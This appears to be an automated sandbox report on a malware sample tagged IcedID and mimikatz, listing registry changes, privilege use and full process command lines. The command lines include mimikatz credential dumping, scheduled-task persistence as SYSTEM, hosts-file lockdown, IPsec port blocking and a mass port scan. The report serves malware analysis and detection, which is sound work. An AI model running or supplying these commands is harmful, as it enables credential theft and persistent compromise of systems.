\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language qugzbwz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language qicmew.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language qugzbwz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 4536 cmd.exe 4060 PING.EXE -
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x0008000000023c73-5.dat nsis_installer_2 behavioral2/files/0x0011000000023c8f-15.dat nsis_installer_1 behavioral2/files/0x0011000000023c8f-15.dat nsis_installer_2 -
Modifies data under HKEY_USERS 45 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uyllzzcqz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uyllzzcqz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uyllzzcqz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uyllzzcqz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uyllzzcqz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uyllzzcqz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uyllzzcqz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ qugzbwz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uyllzzcqz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uyllzzcqz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uyllzzcqz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uyllzzcqz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uyllzzcqz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uyllzzcqz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uyllzzcqz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" qugzbwz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uyllzzcqz.exe Key created \REGISTRY\USER\.DEFAULT\Software uyllzzcqz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uyllzzcqz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uyllzzcqz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uyllzzcqz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uyllzzcqz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uyllzzcqz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" qugzbwz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uyllzzcqz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uyllzzcqz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uyllzzcqz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uyllzzcqz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uyllzzcqz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uyllzzcqz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uyllzzcqz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uyllzzcqz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uyllzzcqz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uyllzzcqz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" qugzbwz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" qugzbwz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uyllzzcqz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing qugzbwz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump uyllzzcqz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uyllzzcqz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals uyllzzcqz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uyllzzcqz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uyllzzcqz.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" uyllzzcqz.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing uyllzzcqz.exe -
Modifies registry class 14 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ qugzbwz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ qugzbwz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ qugzbwz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ qugzbwz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" qugzbwz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ qugzbwz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" qugzbwz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" qugzbwz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ qugzbwz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ qugzbwz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" qugzbwz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" qugzbwz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" qugzbwz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" qugzbwz.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4060 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4396 schtasks.exe 876 schtasks.exe 2480 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1144 qugzbwz.exe 1144 qugzbwz.exe 1144 qugzbwz.exe 1144 qugzbwz.exe 1144 qugzbwz.exe 1144 qugzbwz.exe 1144 qugzbwz.exe 1144 qugzbwz.exe 1144 qugzbwz.exe 1144 qugzbwz.exe 1144 qugzbwz.exe 1144 qugzbwz.exe 1144 qugzbwz.exe 1144 qugzbwz.exe 1144 qugzbwz.exe 1144 qugzbwz.exe 1144 qugzbwz.exe 1144 qugzbwz.exe 1144 qugzbwz.exe 1144 qugzbwz.exe 1144 qugzbwz.exe 1144 qugzbwz.exe 1144 qugzbwz.exe 1144 qugzbwz.exe 1144 qugzbwz.exe 1144 qugzbwz.exe 1144 qugzbwz.exe 1144 qugzbwz.exe 1144 qugzbwz.exe 1144 qugzbwz.exe 1144 qugzbwz.exe 1144 qugzbwz.exe 1144 qugzbwz.exe 1144 qugzbwz.exe 1144 qugzbwz.exe 1144 qugzbwz.exe 1144 qugzbwz.exe 1144 qugzbwz.exe 1144 qugzbwz.exe 1144 qugzbwz.exe 1144 qugzbwz.exe 1144 qugzbwz.exe 1144 qugzbwz.exe 1144 qugzbwz.exe 1144 qugzbwz.exe 1144 qugzbwz.exe 1144 qugzbwz.exe 1144 qugzbwz.exe 1144 qugzbwz.exe 1144 qugzbwz.exe 1144 qugzbwz.exe 1144 qugzbwz.exe 1144 qugzbwz.exe 1144 qugzbwz.exe 1144 qugzbwz.exe 1144 qugzbwz.exe 1144 qugzbwz.exe 1144 qugzbwz.exe 1144 qugzbwz.exe 1144 qugzbwz.exe 1144 qugzbwz.exe 1144 qugzbwz.exe 1144 qugzbwz.exe 1144 qugzbwz.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 4496 2025-01-12_fa07a8a8dd1db8255de1cc41662fa2c5_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 4496 2025-01-12_fa07a8a8dd1db8255de1cc41662fa2c5_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 3356 qugzbwz.exe Token: SeDebugPrivilege 1144 qugzbwz.exe Token: SeDebugPrivilege 2820 vfshost.exe Token: SeDebugPrivilege 4992 uyllzzcqz.exe Token: SeLockMemoryPrivilege 4464 gtnnts.exe Token: SeLockMemoryPrivilege 4464 gtnnts.exe Token: SeDebugPrivilege 1780 uyllzzcqz.exe Token: SeDebugPrivilege 3920 uyllzzcqz.exe Token: SeDebugPrivilege 956 uyllzzcqz.exe Token: SeDebugPrivilege 3916 uyllzzcqz.exe Token: SeDebugPrivilege 3012 uyllzzcqz.exe Token: SeDebugPrivilege 5112 uyllzzcqz.exe Token: SeDebugPrivilege 3128 uyllzzcqz.exe Token: SeDebugPrivilege 3416 uyllzzcqz.exe Token: SeDebugPrivilege 3288 uyllzzcqz.exe Token: SeDebugPrivilege 5108 uyllzzcqz.exe Token: SeDebugPrivilege 4608 uyllzzcqz.exe Token: SeDebugPrivilege 1428 uyllzzcqz.exe Token: SeDebugPrivilege 3592 uyllzzcqz.exe Token: SeDebugPrivilege 2868 uyllzzcqz.exe Token: SeDebugPrivilege 2736 uyllzzcqz.exe Token: SeDebugPrivilege 2704 uyllzzcqz.exe Token: SeDebugPrivilege 4080 uyllzzcqz.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 4496 2025-01-12_fa07a8a8dd1db8255de1cc41662fa2c5_hacktools_icedid_mimikatz.exe 4496 2025-01-12_fa07a8a8dd1db8255de1cc41662fa2c5_hacktools_icedid_mimikatz.exe 3356 qugzbwz.exe 3356 qugzbwz.exe 1144 qugzbwz.exe 1144 qugzbwz.exe 4008 xohudmc.exe 3788 qicmew.exe 1576 qugzbwz.exe 1576 qugzbwz.exe 6016 qugzbwz.exe 6016 qugzbwz.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4496 wrote to memory of 4536 4496 2025-01-12_fa07a8a8dd1db8255de1cc41662fa2c5_hacktools_icedid_mimikatz.exe 83 PID 4496 wrote to memory of 4536 4496 2025-01-12_fa07a8a8dd1db8255de1cc41662fa2c5_hacktools_icedid_mimikatz.exe 83 PID 4496 wrote to memory of 4536 4496 2025-01-12_fa07a8a8dd1db8255de1cc41662fa2c5_hacktools_icedid_mimikatz.exe 83 PID 4536 wrote to memory of 4060 4536 cmd.exe 85 PID 4536 wrote to memory of 4060 4536 cmd.exe 85 PID 4536 wrote to memory of 4060 4536 cmd.exe 85 PID 4536 wrote to memory of 3356 4536 cmd.exe 87 PID 4536 wrote to memory of 3356 4536 cmd.exe 87 PID 4536 wrote to memory of 3356 4536 cmd.exe 87 PID 1144 wrote to memory of 3644 1144 qugzbwz.exe 89 PID 1144 wrote to memory of 3644 1144 qugzbwz.exe 89 PID 1144 wrote to memory of 3644 1144 qugzbwz.exe 89 PID 3644 wrote to memory of 1136 3644 cmd.exe 91 PID 3644 wrote to memory of 1136 3644 cmd.exe 91 PID 3644 wrote to memory of 1136 3644 cmd.exe 91 PID 3644 wrote to memory of 4860 3644 cmd.exe 92 PID 3644 wrote to memory of 4860 3644 cmd.exe 92 PID 3644 wrote to memory of 4860 3644 cmd.exe 92 PID 3644 wrote to memory of 3016 3644 cmd.exe 93 PID 3644 wrote to memory of 3016 3644 cmd.exe 93 PID 3644 wrote to memory of 3016 3644 cmd.exe 93 PID 3644 wrote to memory of 5056 3644 cmd.exe 94 PID 3644 wrote to memory of 5056 3644 cmd.exe 94 PID 3644 wrote to memory of 5056 3644 cmd.exe 94 PID 3644 wrote to memory of 4624 3644 cmd.exe 95 PID 3644 wrote to memory of 4624 3644 cmd.exe 95 PID 3644 wrote to memory of 4624 3644 cmd.exe 95 PID 3644 wrote to memory of 5060 3644 cmd.exe 96 PID 3644 wrote to memory of 5060 3644 cmd.exe 96 PID 3644 wrote to memory of 5060 3644 cmd.exe 96 PID 1144 wrote to memory of 2800 1144 qugzbwz.exe 98 PID 1144 wrote to memory of 2800 1144 qugzbwz.exe 98 PID 1144 wrote to memory of 2800 1144 qugzbwz.exe 98 PID 1144 wrote to memory of 3288 1144 qugzbwz.exe 100 PID 1144 wrote to memory of 3288 1144 qugzbwz.exe 100 PID 1144 wrote to memory of 3288 1144 qugzbwz.exe 100 PID 1144 wrote to memory of 3500 1144 qugzbwz.exe 102 PID 1144 wrote to memory of 3500 1144 qugzbwz.exe 102 PID 1144 wrote to memory of 3500 1144 qugzbwz.exe 102 PID 1144 wrote to memory of 2120 1144 qugzbwz.exe 117 PID 1144 wrote to memory of 2120 1144 qugzbwz.exe 117 PID 1144 wrote to memory of 2120 1144 qugzbwz.exe 117 PID 2120 wrote to memory of 4212 2120 cmd.exe 119 PID 2120 wrote to memory of 4212 2120 cmd.exe 119 PID 2120 wrote to memory of 4212 2120 cmd.exe 119 PID 4212 wrote to memory of 3840 4212 wpcap.exe 120 PID 4212 wrote to memory of 3840 4212 wpcap.exe 120 PID 4212 wrote to memory of 3840 4212 wpcap.exe 120 PID 3840 wrote to memory of 4376 3840 net.exe 122 PID 3840 wrote to memory of 4376 3840 net.exe 122 PID 3840 wrote to memory of 4376 3840 net.exe 122 PID 4212 wrote to memory of 4588 4212 wpcap.exe 123 PID 4212 wrote to memory of 4588 4212 wpcap.exe 123 PID 4212 wrote to memory of 4588 4212 wpcap.exe 123 PID 4588 wrote to memory of 4744 4588 net.exe 125 PID 4588 wrote to memory of 4744 4588 net.exe 125 PID 4588 wrote to memory of 4744 4588 net.exe 125 PID 4212 wrote to memory of 4468 4212 wpcap.exe 126 PID 4212 wrote to memory of 4468 4212 wpcap.exe 126 PID 4212 wrote to memory of 4468 4212 wpcap.exe 126 PID 4468 wrote to memory of 4576 4468 net.exe 128 PID 4468 wrote to memory of 4576 4468 net.exe 128 PID 4468 wrote to memory of 4576 4468 net.exe 128 PID 4212 wrote to memory of 2856 4212 wpcap.exe 129
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2040
-
C:\Windows\TEMP\kqpfindzy\gtnnts.exe"C:\Windows\TEMP\kqpfindzy\gtnnts.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4464
-
-
C:\Users\Admin\AppData\Local\Temp\2025-01-12_fa07a8a8dd1db8255de1cc41662fa2c5_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2025-01-12_fa07a8a8dd1db8255de1cc41662fa2c5_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4496 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\etekeszy\qugzbwz.exe2⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:4536 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4060
-
-
C:\Windows\etekeszy\qugzbwz.exeC:\Windows\etekeszy\qugzbwz.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3356
-
-
-
C:\Windows\etekeszy\qugzbwz.exeC:\Windows\etekeszy\qugzbwz.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1144 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3644 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1136
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
PID:4860
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3016
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
PID:5056
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:4624
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:5060
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2800
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3288
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3500
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\epkuieeth\uybmnnqef\wpcap.exe /S2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2120 -
C:\Windows\epkuieeth\uybmnnqef\wpcap.exeC:\Windows\epkuieeth\uybmnnqef\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4212 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3840 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵PID:4376
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4588 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵PID:4744
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4468 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵PID:4576
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
PID:2856 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
PID:5032
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:1572 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:116 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:2236
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:1896 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:4308 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:3356
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\epkuieeth\uybmnnqef\ttpfdpuzu.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\epkuieeth\uybmnnqef\Scant.txt2⤵
- System Location Discovery: System Language Discovery
PID:3956 -
C:\Windows\epkuieeth\uybmnnqef\ttpfdpuzu.exeC:\Windows\epkuieeth\uybmnnqef\ttpfdpuzu.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\epkuieeth\uybmnnqef\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:4904
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\epkuieeth\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\epkuieeth\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:3904 -
C:\Windows\epkuieeth\Corporate\vfshost.exeC:\Windows\epkuieeth\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2820
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "zitbhebcd" /ru system /tr "cmd /c C:\Windows\ime\qugzbwz.exe"2⤵
- System Location Discovery: System Language Discovery
PID:2972 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:2336
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "zitbhebcd" /ru system /tr "cmd /c C:\Windows\ime\qugzbwz.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4396
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "etgzykkqn" /ru system /tr "cmd /c echo Y|cacls C:\Windows\etekeszy\qugzbwz.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:4388 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:5012
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "etgzykkqn" /ru system /tr "cmd /c echo Y|cacls C:\Windows\etekeszy\qugzbwz.exe /p everyone:F"3⤵
- Scheduled Task/Job: Scheduled Task
PID:876
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "yzcateluu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\kqpfindzy\gtnnts.exe /p everyone:F"2⤵PID:5004
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:3700
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "yzcateluu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\kqpfindzy\gtnnts.exe /p everyone:F"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2480
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3288
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:2516
-
-
